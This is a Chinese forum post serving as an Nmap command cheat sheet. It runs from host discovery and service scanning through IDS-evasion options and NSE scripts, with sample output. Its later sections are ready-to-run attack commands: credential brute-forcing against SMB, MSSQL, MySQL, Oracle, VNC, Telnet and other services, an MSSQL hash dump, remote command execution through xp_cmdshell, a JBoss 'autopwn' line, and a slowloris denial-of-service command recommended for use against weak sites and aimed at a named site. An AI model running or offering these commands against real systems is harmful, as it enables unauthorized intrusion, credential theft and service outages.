roger 发表于 2020-6-4 13:18:05

Nmap 常用命令语法

  Nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端,确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统,正如大多数被用于网络安全的工具,Nmap也是不少黑客及骇客爱用的工具,系统管理员可以利用Nmap来探测工作环境中未经批准使用的服务器,但是黑客会利用Nmap来搜集目标电脑的网络设定,从而计划攻击的方法.

### 主机发现扫描  批量Ping探测: -sP参数,用来批量扫描一个网段的主机存活数,这里的结果只会显示在线的主机.
# nmap -sP 192.168.1.0/24 > scan.log
# cat scan.log | grep "Nmap scan" | awk '{print $5}'
  跳过Ping探测: 有些主机关闭了ping检测,所以可以使用-P0跳过ping的探测,这样可加快扫描速度.
# nmap -P0 192.168.1.7
  计算网段主机IP: 仅列出指定网段上的每台主机,不发送任何报文到目标主机.
# nmap -sL 192.168.1.0/24 > scan.log
# cat scan.log | grep "Nmap scan" | awk '{print $5}'
  扫描在线主机: 扫描一个网段的在线主机列表,功能类似于批量ping检测存活主机.
# nmap -sn 27.201.193.0/24
# cat scan.log | grep "Nmap scan" | awk '{print $5}'
  扫描IP地址范围: 指定探测的网段,看是否在线.
# nmap -sP 192.168.1.1-10
# nmap -sP 27.201.193.100-200
  探测开放端口(TCP/UDP): 探测目标主机开放的端口,可指定一个以逗号分隔的端口列表,如(-pS22,443,80).
# nmap -pS22,80,443 192.168.1.10            // TCP探测
# nmap -pU22,80,443 192.168.1.10            // UDP探测
# nmap -p smtp,http,https 192.168.1.10
  探测主机(SYN/TCP/UDP)扫描: SYN半开放扫描,TCP开放扫描.
# nmap -sS 192.168.1.10       //SYN扫描
# nmap -sT 192.168.1.10       // tcp
# nmap -sU 192.168.1.10       // UDP扫描
# nmap -sA 192.168.1.10       // TCP ACK扫描
  主机协议探测: IP协议扫描,可以确定目标机支持哪些IP协议(TCP, ICMP, IGMP).
# nmap -sO 192.168.1.10 | grep '^'
1      openicmp
6      opentcp
7      openudp
  探测目标系统: 扫描探测目标主机操作系统,这里结果仅供参考有时候并不准确.
# nmap -O 192.168.1.10 | grep "Running:"
Running: Microsoft Windows 2000 | XP
  探测服务版本: 用于扫描目标主机服务的具体版本号.
# nmap -sV 192.168.1.10 | grep '^'
80/tcp   open   http            Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.4.45)
3306/tcp open   mysql         MySQL 5.5.53
139/tcpopen   netbios-ssn
443/tcpopen   ssl/http      VMware VirtualCenter Web service
445/tcpclosed microsoft-ds
912/tcpopen   vmware-auth   VMware Authentication Daemon 1.0 (Uses VNC, SOAP)
  跟踪报文(tracert): 跟踪发送和接收报文的数据流向.
# nmap --packet-trace 192.168.1.10
SENT (4.7014s) TCP 192.168.1.30:50000 > 192.168.1.10:3527 S
SENT (4.7100s) TCP 192.168.1.30:50000 > 192.168.1.10:4446 S
  输出本机接口: 输出检测到的接口列表和系统路由
root@localhost ~]# nmap --iflist 192.168.1.10
  扫描多台主机: 一次性扫描多台目标主机,与网段扫描不相同.
# nmap -sP 192.168.1.10 192.168.1.20
# nmap -sP 192.168.1.10 192.168.1.20 192.168.1.30
  扫描时排除主机:
nmap 10.0.1.161-162--exclude 10.0.1.162       // 排除单个主机
nmap 10.0.1.161-163 --exclude 10.0.1.162-163    // 排除连续主机
nmap 10.0.1.161-163 --exclude 10.0.1.161,10.0.1.163//排除分散主机
nmap 10.0.1.161-163--excludefile ex.txt            // 排除文件里的主机
  控制扫描时间: 调整探测报文的时间间隔,防止在单一主机上等待时间过长.
# nmap --scan-delay 1 192.168.1.10
# nmap --max-scan-delay 1 192.168.1.10   // 表示最多等待1秒
# nmap --max-retries 1 192.168.1.10      // 数据包最多重传1次
  输出指定格式: 通过相关选项,可以让Nmap输出指定的文件格式.
# nmap -oX lyshark.xml 192.168.1.10   // 以XML格式输出扫描结果
# nmap -oN lyshark.log 192.168.1.10   // 以标准格式输出到文本
# nmap -oG lyshark.log 192.168.1.10   // 以Grep可识别的格式输出
  导入扫描文件: 从一个文件中导入IP地址,并进行扫描.
# cat lyshark.log
localhost
www.baidu.com
192.168.1.7

# nmap -iL lyshark.log

### 防火墙的规避  规避IDS检测: 通过设置时间模板(<Paranoid=0|Sneaky=1)的方式,来规避IDS的检测.
# nmap -T0 192.168.1.10
# nmap -T1 192.168.1.10
  报文分段探测: 将TCP头分段在几个包中,使得包过滤器、IDS以及其它工具的检测更加困难.
# nmap -f 192.168.1.10            // 自动分段
# nmap --mtu 4/8/16 192.168.1.10// 自定义分段,必须是4的倍数
  使用诱饵绕过: 使用诱饵隐蔽扫描,此处也可用自己的真实IP作为诱饵.
# nmap -D 192.168.1.1 192.168.1.10

### 使用扫描脚本  Nmap不仅用于端口扫描,服务检测,其还具有强大的脚本功能,利用Nmap Script可以快速探测服务器,一般情况下,常用的扫描脚本会放在/usr/share/nmap/script目录下,并且脚本扩招名为*.nse后缀的,接下来将介绍最常用的扫描脚本.
  扫描WEB敏感目录: 通过使用--script=http-enum.nse可以扫描网站的敏感目录.
# nmap -p 80 --script=http-enum.nse www.mkdirs.com

Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-31 01:49 EDT
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000010s latency).
Not shown: 995 closed ports
PORT   STATE SERVICE
21/tcp   openftp
22/tcp   openssh
25/tcp   opensmtp
80/tcp   openhttp
| http-enum:
|   /login.php: Possible admin folder
|   /robots.txt: Robots file
|   /config/: Potentially interesting folder w/ directory listing
|   /docs/: Potentially interesting folder w/ directory listing
|   /external/: Potentially interesting folder w/ directory listing
|_/icons/: Potentially interesting folder w/ directory listing
3306/tcp openmysql

Nmap done: 1 IP address (1 host up) scanned in 1.18 seconds
  绕开鉴权: 负责处理鉴权证书(绕开鉴权)的脚本,也可以作为检测部分应用弱口令.
# nmap --script=auth www.mkdirs.com

Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-30 23:16 EDT
Nmap scan report for localhost (127.0.0.1)
Host is up (0.0000090s latency).
Not shown: 995 closed ports
PORT   STATE SERVICE
21/tcp   openftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    2 0      0               6 Oct 30 19:45 pub
22/tcp   openssh
25/tcp   opensmtp
| smtp-enum-users:
|_root
80/tcp   openhttp
| http-domino-enum-passwords:
|_ERROR: No valid credentials were found
3306/tcp openmysql

Nmap done: 1 IP address (1 host up) scanned in 0.89 seconds
  默认脚本扫描: 脚本扫描,主要是搜集各种应用服务的信息,收集到后可再针对具体服务进行攻击.
# nmap --script=default www.mkdirs.com

Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-30 23:21 EDT
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000010s latency).
Not shown: 995 closed ports
PORT   STATE SERVICE
21/tcp   openftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    2 0      0               6 Oct 30 19:45 pub
22/tcp   openssh
| ssh-hostkey: 2048 c2:89:44:fc:e3:1b:5a:65:a1:6e:11:34:73:6d:d5:04 (RSA)
|_256 54:0e:d4:47:2f:b2:d4:2b:33:b6:d8:35:66:2d:a2:aa (ECDSA)
3306/tcp openmysql
| mysql-info: Protocol: 10
| Version: 5.5.60-MariaDB
| Thread ID: 10408
| Status: Autocommit
|_Salt: <D"y]F(2

Nmap done: 1 IP address (1 host up) scanned in 1.06 seconds
  检测常见漏洞: 通过使用--script=luln,可以扫描网站的常见漏洞,以及网页的目录结构.
# nmap --script=vuln www.mkdirs.com

Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-30 23:24 EDT
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000017s latency).
Not shown: 995 closed ports
PORT   STATE SERVICE
21/tcp   openftp
22/tcp   openssh
25/tcp   opensmtp
| smtp-vuln-cve2010-4344:
|_The SMTP server is not Exim: NOT VULNERABLE
80/tcp   openhttp
| http-enum:
|   /login.php: Possible admin folder
|   /robots.txt: Robots file
|   /config/: Potentially interesting folder w/ directory listing
|   /docs/: Potentially interesting folder w/ directory listing
|   /external/: Potentially interesting folder w/ directory listing
|_/icons/: Potentially interesting folder w/ directory listing
|_http-fileupload-exploiter:
|_http-frontpage-login: false
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
3306/tcp openmysql

Nmap done: 1 IP address (1 host up) scanned in 14.40 seconds
  内网服务探测: 通过使用--script=broadcast,可以实现在局域网内探查更多服务开启状况.
# nmap -n -p445 --script=broadcast 127.0.0.1

Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-30 23:28 EDT
Pre-scan script results:
| broadcast-dhcp-discover:
|   IP Offered: 192.168.1.14
|   Server Identifier: 192.168.1.1
|   Subnet Mask: 255.255.255.0
|   Router: 192.168.1.1
|_Domain Name Server: 192.168.1.1
| broadcast-eigrp-discovery:
|_ ERROR: Couldn't get an A.S value.
| broadcast-listener:
|   ether
|       ARP Request
|         sender ip    sender mac         target ip
|         192.168.1.143:72:23:04:56:21192.168.1.2
|         192.168.1.2B4:8C:28:BE:4C:34192.168.1.1
|       EIGRP Update
........
  进行WhoIS查询: 通过使用--script whois模块,可以查询网站的简单信息.
# nmap --script whois www.baidu.com

Host script results:
| whois: Record found at whois.apnic.net
| inetnum: 61.135.0.0 - 61.135.255.255
| netname: UNICOM-BJ
| descr: China Unicom Beijing province network
| country: CN
| person: ChinaUnicom Hostmaster
|_email: hqs-ipabuse@chinaunicom.cn

Nmap done: 1 IP address (1 host up) scanned in 4.76 seconds
  详细WhoIS解析: 利用第三方的数据库或资源,查询详细的WhoIS解析情况.
# nmap --script external www.baidu.com

Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-30 23:31 EDT
Nmap scan report for www.baidu.com (61.135.169.125)
Host is up (0.018s latency).
|_http-robtex-shared-ns: ERROR: Script execution failed (use -d to debug)
| ip-geolocation-geoplugin:
| 61.135.169.125 (www.baidu.com)
|   coordinates (lat,lon): 39.9288,116.3889
|_state: Beijing, China
|_ip-geolocation-maxmind: ERROR: Script execution failed (use -d to debug)
| whois: Record found at whois.apnic.net
| inetnum: 61.135.0.0 - 61.135.255.255
| netname: UNICOM-BJ
| descr: China Unicom Beijing province network
|_country: CN
.....
  发现内网网关: 通过使用--script=broadcast-netbios-master-browser可以发现内网网关的地址.
# nmap --script=broadcast-netbios-master-browser 192.168.1.1

Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-31 02:05 EDT
Pre-scan script results:
| broadcast-netbios-master-browser:
| ip         server          domain
|_192.168.1.2Web-Server   WORKGROUP
Nmap scan report for 192.168.1.1
Host is up (0.0011s latency).
Not shown: 998 closed ports
PORT   STATE    SERVICE
80/tcp   filtered http
1900/tcp open   upnp
MAC Address: 42:1C:1B:E7:B1:B2 (TP-Link)
  发现WEB中Robots文件: 通过使用--script=http-robots.txt.nse可以检测到robots文件内容.
# nmap --script=http-robots.txt.nse www.baidu.com

Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-31 02:12 EDT
Nmap scan report for www.baidu.com (61.135.169.125)
Host is up (0.019s latency).
Other addresses for www.baidu.com (not scanned): 61.135.169.121
Not shown: 998 filtered ports
PORT    STATE SERVICE
80/tcpopenhttp
| http-robots.txt: 9 disallowed entries
| /baidu /s? /ulink? /link? /home/news/data/ /shifen/
|_/homepage/ /cpro /
443/tcp openhttps
| http-robots.txt: 9 disallowed entries
| /baidu /s? /ulink? /link? /home/news/data/ /shifen/
|_/homepage/ /cpro /

Nmap done: 1 IP address (1 host up) scanned in 5.06 seconds
  检查WEB服务器时间: 检查web服务器的当前时间.
# nmap -p 443 --script http-date.nse www.baidu.com

Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-31 02:16 EDT
Nmap scan report for www.baidu.com (61.135.169.121)
Host is up (0.017s latency).
Other addresses for www.baidu.com (not scanned): 61.135.169.125
PORT    STATE SERVICE
443/tcp openhttps
|_http-date: Sun, 31 Mar 2019 06:16:53 GMT; 0s from local time.

Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds
  执行DOS攻击: dos攻击,对于处理能力较小的站点还挺好用的.
# nmap --script http-slowloris --max-parallelism 1000 www.mkdirs.com
Warning: Your max-parallelism (-M) option is extraordinarily high, which can hurt reliability

Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-31 02:21 EDT
  检查DNS子域: 检查目标ns服务器是否允许传送,如果能,直接把子域拖出来就好了.
# nmap -p 53 --script dns-zone-transfer.nse -v www.baidu.com

Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-31 02:28 EDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating Ping Scan at 02:28
Scanning www.baidu.com (61.135.169.121)
Completed Ping Scan at 02:28, 0.02s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 02:28
Completed Parallel DNS resolution of 1 host. at 02:28, 0.01s elapsed
Initiating SYN Stealth Scan at 02:28
Scanning www.baidu.com (61.135.169.121)
Completed SYN Stealth Scan at 02:28, 0.20s elapsed (1 total ports)
NSE: Script scanning 61.135.169.121.
Nmap scan report for www.baidu.com (61.135.169.121)
Host is up (0.016s latency).
Other addresses for www.baidu.com (not scanned): 61.135.169.125
PORT   STATE    SERVICE
53/tcp filtered domain

NSE: Script Post-scanning.
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds
         Raw packets sent: 6 (240B) | Rcvd: 1 (28B)
  查询WEB旁站: 旁站查询,ip2hosts接口该接口似乎早已停用,如果想继续用,可自行到脚本里把接口部分的代码改掉.
# nmap -p80 --script hostmap-ip2hosts.nse www.baidu.com

Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-31 02:29 EDT
Nmap scan report for www.baidu.com (61.135.169.121)
Host is up (0.017s latency).
Other addresses for www.baidu.com (not scanned): 61.135.169.125
PORT   STATE SERVICE
80/tcp openhttp

Host script results:
| hostmap-ip2hosts:
|_hosts: Error: could not GET http://www.ip2hosts.com/csv.php?ip=61.135.169.121

Nmap done: 1 IP address (1 host up) scanned in 5.89 seconds

### 口令爆破模块  暴力破解DNS记录: 这里以破解百度的域名为例子,由于内容较多这里简化显示.
# nmap --script=dns-brute.nse www.baidu.com

Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-31 03:19 EDT
Nmap scan report for www.baidu.com (61.135.169.125)
Host is up (0.018s latency).
Other addresses for www.baidu.com (not scanned): 61.135.169.121
Not shown: 998 filtered ports
PORT    STATE SERVICE
80/tcpopenhttp
443/tcp openhttps

Host script results:
| dns-brute:
|   DNS Brute-force hostnames
|   lab.baidu.com - 180.149.144.192
|   lab.baidu.com - 180.149.132.122
|   corp.baidu.com - 123.129.254.12
|_    log.baidu.com - 10.26.39.14

Nmap done: 1 IP address (1 host up) scanned in 10.58 seconds
  内网VNC扫描: 通过使用脚本,检查VNC版本等一些敏感信息.
# nmap --script=realvnc-auth-bypass 127.0.0.1                                          #检查VNC版本
# nmap --script=vnc-auth 127.0.0.1                                                       #检查VNC认证方式
# nmap --script=vnc-info 127.0.0.1                                                       #获取VNC信息
# nmap --script=vnc-brute.nse --script-args=userdb=/user.txt,passdb=/pass.txt 127.0.0.1#暴力破解VNC密码
  内网SMB扫描: 检查局域网中的Samba服务器,以及对服务器的暴力破解.
# nmap --script=smb-brute.nse 127.0.0.1                                                            #简单尝试破解SMB服务
# nmap --script=smb-check-vulns.nse --script-args=unsafe=1 127.0.0.1                               #SMB已知几个严重漏
# nmap --script=smb-brute.nse --script-args=userdb=/user.txt,passdb=/pass.txt 127.0.0.1            #通过传递字段文件,进行暴力破解
# nmap -p445 -n --script=smb-psexec --script-args=smbuser=admin,smbpass=1233 127.0.0.1             #查询主机一些敏感信息:nmap_service
# nmap -n -p445 --script=smb-enum-sessions.nse --script-args=smbuser=admin,smbpass=1233 127.0.0.1#查看会话
# nmap -n -p445 --script=smb-os-discovery.nse --script-args=smbuser=admin,smbpass=1233 127.0.0.1   #查看系统信息
  MSSQL扫描: 检查局域网中的SQL Server服务器,以及对服务器的暴力破解.
# nmap -p1433 --script=ms-sql-brute --script-args=userdb=/var/passwd,passdb=/var/passwd 127.0.0.1#暴力破解MSSQL密码
# nmap -p 1433 --script ms-sql-dump-hashes.nse --script-args mssql.username=sa,mssql.password=sa 127.0.0.1   #dumphash值
# nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="net user" 192.168.137.4 xp_cmdshell      #执行命令
  MYSQL扫描: 检查局域网中的MySQL服务器,以及对服务器的暴力破解.
# nmap -p3306 --script=mysql-empty-password.nse 127.0.0.1                                             #扫描root空口令
# nmap -p3306 --script=mysql-users.nse --script-args=mysqluser=root 127.0.0.1                         #列出所有用户
# nmap -p3306 --script=mysql-brute.nse --script-args=userdb=/var/passwd,passdb=/var/passwd 127.0.0.1#暴力破解MYSQL口令
  Oracle扫描: 检查局域网中的Oracle服务器,以及对服务器的暴力破解.
# nmap --script=oracle-sid-brute -p 1521-1560 127.0.0.1    #oracle sid扫描
# nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=ORCL,userdb=/var/passwd,passdb=/var/passwd 127.0.0.1   #oracle弱口令破解
  爆破Telnet:
nmap -p 23 --script telnet-brute \
         --script-args userdb=myusers.lst,passdb=.mypwds.lst,telnet-brute.timeout=8s 192.168.1.103

nmap --script=broadcast-netbios-master-browser 192.168.137.4   发现网关

nmap -p 873 --script rsync-brute --script-args 'rsync-brute.module=www' 192.168.137.4破解rsync

nmap --script informix-brute -p 9088 192.168.137.4    informix数据库破解

nmap -p 5432 --script pgsql-brute 192.168.137.4       pgsql破解

nmap -sU --script snmp-brute 192.168.137.4            snmp破解

nmap -sV --script=telnet-brute 192.168.137.4          telnet破解

nmap --script=http-vuln-cve2010-0738 --script-args 'http-vuln-cve2010-0738.paths={/path1/,/path2/}' <target>jboss autopwn

nmap --script=http-methods.nse 192.168.137.4 检查http方法

nmap --script http-slowloris --max-parallelism 400 192.168.137.4dos攻击,对于处理能力较小的站点还挺好用的 'half-HTTP' connections

nmap --script=samba-vuln-cve-2012-1182-p 139 192.168.137.4
nmap -iR 1000 -sS -PS80 -p 80 -oG nmap.txt
Nmap 变成漏扫使用  1.去 https://github.com/scipag/vulscan 下载项目,并整个解压到nmap 的script目录下,然后执命令
nmap -sV --script=vulscan/vulscan.nse
#使用默认的库进行漏洞扫描
nmap -sV --script=vulscan/vulscan.nse --script-args vulscandb=cve.csv
#使用特定的库cve.csv扫描
nmap -sV --script=vulscan/vulscan.nse --script-args vulscandb=exploitdb.csv
nmap -sV --script=vulscan/vulscan.nse --script-args vulscandb=securitytracker.csv
nmap -sV --script=vulscan/vulscan.nse --script-args vulscandb=xforce.csv
nmap -sV --script=vulscan/vulscan.nse --script-args vulscandb=scipvuldb.csv
nmap -sV --script=vulscan/vulscan.nse --script-args vulscandb=openvas.csv
nmap -sV --script=vulscan/vulscan.nse --script-args vulscandb=xforce.csv
nmap -sV --script=vulscan/vulscan.nse --script-args vulscandb=osvdb.csv

页: [1]
查看完整版本: Nmap 常用命令语法